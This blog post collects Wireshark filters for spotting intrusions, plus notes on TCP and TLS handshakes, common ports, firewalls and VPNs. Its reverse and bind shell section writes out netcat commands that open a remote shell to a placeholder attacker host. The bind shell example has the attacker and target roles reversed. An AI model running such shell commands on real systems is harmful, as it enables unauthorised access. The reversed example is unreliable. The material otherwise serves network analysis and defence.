---
title: "Traffic Analysis Techniques with WireShark"
date: 2022-07-30T10:29:00Z
draft: false
toc: true
type: post
author: Kaptan
categories:
  - Cyber Security
tags:
  - wireshark
  - network
  - security
---

In the realm of cybersecurity, analyzing network traffic plays a crucial role in identifying threats and vulnerabilities. Various tools and techniques are employed to scrutinize packets and extract meaningful insights. Let's delve into some common traffic analysis methodologies and the corresponding Wireshark filters:

## Detecting Intrusions and Suspicious Activities

**To filter packets based on User-Agent information:**

```zsh
frame contains "User-Agent-info"
```

**When scanning with a Python program:**

```zsh
frame contains "python-requests"
```

**During username and password attempts:**

```zsh
frame contains "Username and/or password incorrect."
```

**Identifying executed commands after receiving a reverse shell:**

```zsh
tcp.flags.push==1 and tcp.flags.ack==1 and tcp.port==5555
```

**Detecting file uploads:**

```zsh
http.request.method==POST
```

**Monitoring file manager usage:**

```zsh
frame contains "gvfs"
```

**Observing requests made by Cadaver:**

```zsh
http.user_agent contains cadaver
```

**Identifying requests to shell.php via a browser:**

```zsh
frame contains "shell.php" and http
```

**Recognizing potential LFI via the 'page' parameter:**

```zsh
http.request.uri contains "page"
```

**Analyzing DNS A records:**

```zsh
dns.a
```

**Identifying traffic related to a phishing tool:**

```zsh
frame contains "canarytoken"
```

**Show only 4444 port in traffic:**

```zsh
tcp.port==4444
```

**Configuring icmpsh on Kali:**


```zsh
sysctl -w net.ipv4.icmp_echo_ignore_all=1
```

**Transmitting data via reverse shell using PSH and ACK flags:**

```zsh
tcp.flags.ack==1 and tcp.flags.push==1 and ip.src==127.0.0.1 and ip.dst==127.0.0.1
```

## Customizing Filters

**Operators:**

English | C-like  | Description | Example
--------|---------|-------------|-------------
eq | ==  | Equal (any if more than one)  |  ip.src == 10.0.0.5
ne | !=  | Not equal (all if more than one)  |  ip.src != 10.0.0.5
|  | === | Equal (all if more than one)  | ip.src === 10.0.0.5
|  | !== | Not equal (any if more than one)  | ip.src !== 10.0.0.5
gt | >   | Greater than | frame.len > 10
lt | <   | Less than |  frame.len < 128
ge | >=  | Greater than or equal to | frame.len ge 0x100
le | <=  | Less than or equal to | frame.len <= 0x20
contains | | Protocol, field or slice contains a value | sip.To contains "a1762"
matches | ~ | Protocol or text field matches a Perl-compatible regular expression | http.host matches "acme\\\\.(org|com|net)"
and | && | Logical AND | ip.src==10.0.0.5 and tcp.flags.fin
or  | &#124;&#124; | Logical OR  | ip.src==10.0.0.5 or ip.src==192.1.1.1
xor | ^^ | Logical XOR | tr.dst[0:3] == 0.6.29 xor tr.src[0:3] == 0.6.29
not | !  | Logical NOT | not llc
[…] |    | Subsequence | See "Slice Operator" below.
in  |    | Set Membership | http.request.method in {"HEAD", "GET"}. See "Membership Operator" below.

{{< figure src="/img/content/cyber-security/wireshark-customizing-filters.png" alt="wireshark-customizing-filters" loading="lazy" width="100%" height="auto" >}}

### Enhanced Filtering Examples

**Source and Destination IP Filtering**

- Example filter: `ip.src == <SRC IP Address> and ip.dst == <DST IP Address>`

**Port-Based Filtering**

- Example filter: `tcp.port eq <Port Number> or <Protocol Name>`

### Additional Information

**Utilizing Statistics**

- Accessing statistics via the user interface: `Statistics > Conversations`

**Packet Comments Search Function**

- Utilizing the search function for packet comments:
  - Navigation: `Edit -> Find Packet` 
  - Selection options: `String`, `packet details`
  - Display filter: `[frame.comment contains "Your string"]`


## TCP Packet Headers and Handshake Messages Overview

Understanding TCP packet headers and handshake messages is crucial for analyzing network communication protocols. This section provides a detailed overview of common TCP packet headers and handshake messages, along with their descriptions.

### TCP Packet Headers Overview

| Header | Description
|--------|-------------------
| Source Port  | The port opened by the sender to transmit the TCP packet. It is randomly chosen from available ports (0-65535) not in use at the time. |
| Destination Port     | The port number where the receiving application or service is running on the remote host. For example, a webserver typically operates on port 80.    |
| Source IP    | The IP address of the device sending the packet.       |
| Destination IP       | The IP address of the device the packet is intended for.|
| Sequence Number      | Assigned to the initial data transmitted in a connection, providing a starting point for sequencing subsequent data packets.        |
| Acknowledgement Number | Indicates the next expected sequence number, acknowledging receipt of data up to this point.      |
| Checksum     | A value computed to ensure the integrity of TCP data. Discrepancies between computed and received checksums indicate potential data corruption.     |
| Data| Stores the actual payload of the packet, such as bytes of a file being transmitted.       |
| Flag| Determines packet handling during the handshake process. Various flags dictate specific behaviors, crucial for protocol adherence and packet interpretation. |

{{< figure src="/img/content/cyber-security/wireshark-tcp-packet-headers.png" alt="wireshark-tcp-packet-headers" loading="lazy" width="100%" height="auto" >}}

### TCP Handshake Messages

| Step | Message  | Description 
|------|----------|--------------
| 1 | `SYN` | A SYN message serves as the initial packet sent by a client to initiate a connection and synchronize with the server. It marks the beginning of the handshake process.
| 2 | `SYN/ACK` | Sent by the server in response to the SYN message, the SYN/ACK packet acknowledges the synchronization attempt from the client, indicating readiness to establish a connection.
| 3 | `ACK` | The acknowledgement packet confirms the successful receipt of a series of messages or packets, ensuring data integrity and facilitating further communication.    
| 4 | `DATA` | Once the connection is established, data transmission occurs through the DATA message, which contains the payload, such as bytes of a file being transferred.   
| 5 | `FIN` | Used to gracefully close the connection after completion, the FIN packet signals the termination of communication between the client and server.
| # | `RST` | This packet abruptly terminates all communication and is employed as a last resort in case of problems during the process, such as application errors or system faults. 
|   | `URG` | The Urgent flag indicates that the urgent pointer field is significant, prioritizing immediate processing of incoming data marked as urgent.
|   | `PSH` | The Push flag instructs TCP to promptly deliver data to the application, bypassing any buffering mechanisms for efficient data transfer.       


## Protocol Overview and Port Descriptions

| Protocol | Port Number | Description | Data Security
|----------|-------------|-------------|---------------
| File Transfer Protocol (FTP)| 21  | Used by file-sharing applications operating on a client-server model, facilitating file downloads from a central location. | Cleartext      |
| Secure Shell (SSH)  | 22  | Enables secure login to systems via a text-based interface for management purposes, ensuring data confidentiality and integrity.    | Secure |
| Telnet     | 23  | Provides remote access with communication occurring in cleartext, leaving sensitive data vulnerable to interception.       | Cleartext      |
| SMTP       | 25  | Handles email transmission (MTA) with data transmitted in cleartext, lacking encryption for secure communication. | Cleartext      |
| HyperText Transfer Protocol (HTTP)   | 80  | Powering the World Wide Web (WWW), HTTP facilitates the downloading of text, images, and videos of web pages.        | Cleartext      |
| POP3       | 110 | Similar to IMAP, POP3 enables email retrieval (MDA) with data transmitted in cleartext, potentially exposing sensitive email information.  | Cleartext      |
| IMAP       | 143 | Facilitates email retrieval (MDA), transmitting data in cleartext, posing security risks for sensitive email content.      | Cleartext      |
| HyperText Transfer Protocol Secure (HTTPS)   | 443 | Functions similarly to HTTP but ensures secure communication through encryption, safeguarding sensitive data during transmission.    | Encrypted      |
| Server Message Block (SMB)  | 445 | Similar to FTP, SMB enables file sharing and also allows the sharing of devices like printers over a network.      | Cleartext      |
| Remote Desktop Protocol (RDP)        | 3389        | Provides a secure means of logging into a system using a visual desktop interface, offering a graphical alternative to SSH. | Secure |

**Table of the 1024 common ports:**
- http://www.vmaxx.net/techinfo/ports.htm


## Firewall Categories and Descriptions

### Stateful Firewall

- **Description:**
  - This firewall type dynamically determines device behavior based on the entirety of a connection.
  - Resource-intensive due to dynamic decision-making processes.
  - Capable of allowing initial parts of a TCP handshake that might later fail.
  - Can block the entire device if a connection from a host is deemed bad.

### Stateless Firewall

- **Description:**
  - Utilizes a static set of rules to assess the acceptability of individual packets.
  - Consumes fewer resources compared to stateful firewalls.
  - Relies heavily on predefined rules; unmatched rules render the firewall ineffective.
  - Effective for handling large volumes of traffic from specific hosts, such as in Distributed Denial-of-Service (DDoS) attacks.

## VPN Technologies Overview

### PPP (Point-to-Point Protocol)

- **Description:**
  - PPP is utilized by PPTP to enable authentication and encryption of data.
  - VPNs employ private keys and public certificates, similar to SSH, for secure connections.
  - PPP itself is non-routable and requires PPTP for data to travel beyond the local network.

### PPTP (Point-to-Point Tunneling Protocol)

- **Description:**
  - PPTP facilitates the transmission of data from PPP, allowing it to traverse and exit a network.
  - PPTP is easy to set up and widely supported but is relatively weakly encrypted compared to other VPN alternatives.

### IPSec (Internet Protocol Security)

- **Description:**
  - IPSec encrypts data within the existing Internet Protocol (IP) framework, ensuring secure communication.
  - While more challenging to configure than other options, IPSec offers robust encryption and broad device support once successfully implemented.


## Protocol Types and Descriptions

| Protocol Type | Description 
|---------------|-------------
| Network Communication Protocols | Facilitate communication between two or more devices over one or more networks. The family of Ethernet technologies includes protocols such as IP, Transmission Control Protocol (TCP), Hypertext Transfer Protocol (HTTP), and many others. |
| Network Security Protocols | Ensure the security of data by providing authentication, data integrity, and data encryption. Examples of secure protocols include Secure Shell (SSH), Secure Socket Layer (SSL), and Transport Layer Security (TLS). |
| Routing Protocols | Enable routers to exchange route information, compare route information, and then select the best path to a destination network. Examples of routing protocols include Open Shortest Path First (OSPF) and Border Gateway Protocol (BGP). |
| Service Discovery Protocols | Used for automatic detection of devices or services. Examples of service discovery protocols include Dynamic Host Configuration Protocol (DHCP) for discovering services for IP address allocation and Domain Name System (DNS) for translating domain names to IP addresses. |


## Difference between GET and POST Requests

| S.No. | GET Request | POST Request
|-------|-------------|----------------
| 1.    | GET retrieves a representation of the specified resource. | POST is for writing data, to be processed to the identified resource. |
| 2.    | It typically has relevant information in the URL of the request. | It typically has relevant information in the body of the request.     |
| 3.    | It is limited by the maximum length of the URL supported by the browser and web server. | It does not have such limits.     |
| 4.    | It is the default HTTP method.| In this, we need to specify the method as POST to send a request with the POST method. |
| 5.    | You can bookmark GET requests.| You cannot bookmark POST requests. |
| 6.    | It is less secure because data sent is part of the URL. | It is a little safer because the parameters are not stored in browser history or in web server logs. |
| 7.    | It is cacheable.       | It is not cacheable.       |
| 8.    | For example, GET the page showing a particular question. | For example, Send a POST request by clicking the "Add to cart" button. |


## Reverse Shells & Bind Shells

Reverse shells and bind shells are both techniques used for remote code execution, but they operate differently and have distinct advantages and disadvantages. Understanding these differences is crucial for effectively executing attacks and bypassing security measures.

### Reverse Shells

Reverse shells involve forcing the target to execute code that connects back to the attacker's computer. This allows the attacker to set up a listener on their own machine to receive the incoming connection. Reverse shells are useful for bypassing firewall rules that may prevent direct connections to arbitrary ports on the target.

- **On the attacking machine:**
   ```bash
   sudo nc -lvnp [PORT]
   ```

- **On the target machine:**
   ```bash
   nc [LOCAL-IP] [PORT] -e /bin/bash
   ```

### Bind Shells

Bind shells involve executing code on the target machine to start a listener attached to a shell directly on the target. This listener is then opened up to the internet, allowing the attacker to connect to the specified port and obtain remote code execution. Bind shells do not require any configuration on the attacker's network but may be prevented by firewalls protecting the target.

- **On the attacking machine:**
   ```bash
   nc -lvnp [PORT] -e "cmd.exe"
   ```

- **On the target machine:**
   ```bash
   nc MACHINE_IP [PORT]
   ```

## TLS Handshake Process Overview

The TLS (Transport Layer Security) handshake process establishes a secure connection between a client and a server. This process involves several steps to negotiate connection parameters and exchange cryptographic keys.

{{< figure src="/img/content/cyber-security/wireshark-tls-handshake-process.png" alt="wireshark-tls-handshake-process" loading="lazy" width="100%" height="auto" >}}

- **ClientHello**: The client sends a ClientHello message to the server, indicating its capabilities, such as supported algorithms.

- **ServerHello**: The server responds with a ServerHello message, indicating the selected connection parameters. If server authentication is required, the server provides its certificate, which is a digital file to identify itself. The certificate is usually digitally signed by a third party. The server might also send additional information necessary to generate the master key in its ServerKeyExchange message before sending the ServerHelloDone message to indicate that it is done with the negotiation.

- **ClientKeyExchange**: The client responds with a ClientKeyExchange message, which contains additional information required to generate the master key. Furthermore, it switches to using encryption and informs the server using the ChangeCipherSpec message.

- **ChangeCipherSpec**: The server switches to using encryption as well and informs the client in the ChangeCipherSpec message.

TCP is characterized by its connection-oriented nature, meaning TCP establishes a connection between a device serving as both the client and the server before data transmission can occur.

## Encapsulation & Decapsulation

**Encapsulation**:
- In computer networks, encapsulation is a method of designing modular communication protocols where logical functions in the network are abstracted from their underlying structures through inclusion or information hiding in higher-level objects.
- The data movement starts from the upper layer and ends at the lowest layer.
- The process involves adding header and trailer sections.
- This process is executed first, followed by decapsulation.
- It occurs inside the source device.

**Decapsulation**:
- When moving towards its destination, the process of removing header and trailer information from a packet.
- Occurs when data is received on the destination computer during transmission (request).
- Data moves from the lower layer to the upper layer.
- This process involves removing header and trailer sections.
- It is executed after encapsulation is complete.
- Occurs inside the destination device.


### Resources

- https://wiki.wireshark.org/CaptureFilters
- https://www.wireshark.org/docs/wsug_html_chunked/ChWorkBuildDisplayFilterSection.html
- https://www.wireshark.org/docs/wsug_html_chunked/AppToolstshark.html
